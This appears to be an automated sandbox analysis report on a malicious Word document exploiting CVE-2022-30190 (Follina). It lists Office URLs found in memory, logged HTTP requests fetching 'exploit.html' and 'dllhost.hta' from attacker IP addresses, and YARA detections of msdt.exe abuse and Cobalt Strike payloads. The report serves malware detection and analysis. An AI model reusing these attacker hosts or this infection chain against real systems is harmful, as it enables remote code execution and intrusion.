Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://directory.services.
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://graph.windows.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://invites.office.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: mshta.exe, 00000019.00000002.559463077.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://login.windows.local
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://management.azure.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://management.azure.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://osi.office.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://outlook.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://roaming.edog.
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://tasks.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: global traffic	HTTP traffic detected: GET /exploit.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exploit.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dllhost.hta HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 159.75.135.162:61256Connection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: document.xml.rels, type: SAMPLE

Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen

Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE	Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
Source: 00000019.00000003.506676110.000000000626D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499865318.0000000006E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.498703501.000000000583F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500021102.0000000006E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500164196.0000000006E17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509313999.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499436698.0000000006E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500090549.0000000006E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500504965.0000000006DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499684731.0000000006E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509423270.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500246766.0000000006E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568757163.0000000006E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.505927561.000000000636D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500477251.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508961693.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500075794.0000000006E2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499611659.0000000006E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500491953.0000000006DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499493418.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508307572.0000000005E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500524387.0000000006DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500409413.0000000006DE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: 00000019.00000003.503297847.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
